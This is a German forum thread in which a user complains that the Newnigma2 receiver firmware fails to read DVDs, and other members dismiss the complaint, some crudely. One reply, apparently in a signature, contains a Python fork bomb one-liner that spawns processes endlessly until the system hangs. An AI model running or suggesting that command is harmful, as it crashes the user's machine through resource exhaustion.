KRITIK an NEWNIGMA2

  • KRITIK an NEWNIGMA2

    Hallo ,
    möchte gern die Newnigma2 programmierer fragen, ob sie nicht inderlagen sind
    die Firmware so zu machen das die frmware auch alle DVD's lesen tut.
    Ob es gebranntes oder Original sind.....

    Wie z.b alle andere Firmware geht es , EDG Nemesis oder Gemini 4.5-4.6-4.7
    oder Nabilo usw usw.nur bei euch geht es nicht,
    seid Ihr nicht interlage es zu Schreiben oder wohlt Ihr nicht, genau wie wen man euch ein Nachricht Schreibt gibt es auch kein Antwort.


    MfG Gigi70

    ES ist nur ein Kritik

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Gigi70 ()

  • Tja. Ich kann hier nur antworten, dass bei mir DVDs laufen.
    Und da sonst noch niemand dieses Problem geschildert hat, scheinst du wohl alleine dazustehen.
    Gruß
    Dumbo

    In einer irrsinnigen Welt vernünftig sein zu wollen, ist schon wieder ein Irrsinn für sich.
  • Original von alexander33
    mit dem keine Antwort bekommen hast du leider RECHT!


    Wo ist dein Problem. Du hast doch immer Antworten bekommen X(
    Gruß
    Dumbo

    In einer irrsinnigen Welt vernünftig sein zu wollen, ist schon wieder ein Irrsinn für sich.
  • Original von alexander33
    wenn man das so sieht, keine Antwort ist auch eine Antwort, dann schon!



    ihr habt sorgen meine fresse. es gibt eh ein neues oe und kernel. fixen oder sonst braucht man nun eh nichts mehr..meckert dann beim naechsten release, wenn es nicht geht und bitte packt gleich die logs dazu !!
  • RE: KRITIK an NEWNIGMA2

    Original von Gigi70
    Hallo ,
    möchte gern die Newnigma2 programmierer fragen, ob sie nicht inderlagen sind
    die Firmware so zu machen das die frmware auch alle DVD's lesen tut.
    Ob es gebranntes oder Original sind.....

    Wie z.b alle andere Firmware geht es , EDG Nemesis oder Gemini 4.5-4.6-4.7
    oder Nabilo usw usw.nur bei euch geht es nicht,
    seid Ihr nicht interlage es zu Schreiben oder wohlt Ihr nicht, genau wie wen man euch ein Nachricht Schreibt gibt es auch kein Antwort.


    MfG Gigi70

    ES ist nur ein Kritik


    Kritik? das ist das dümmste was ich je gelesen hab vorallem weil es nicht der wahrheit entspricht.
    *close*
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Original von alexander33
    Bei mir laufen auch alle, nur mit ba gibts immer Problme mit dem DVD Laufwerk. Bei gemini gibts da keine Problme aber das gemini gefällt mir nicht so gut.


    wir supporten kein BA und gemini ist mir persönlich latte es bleibt jedem selbst überlassen welches image er verwendet
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.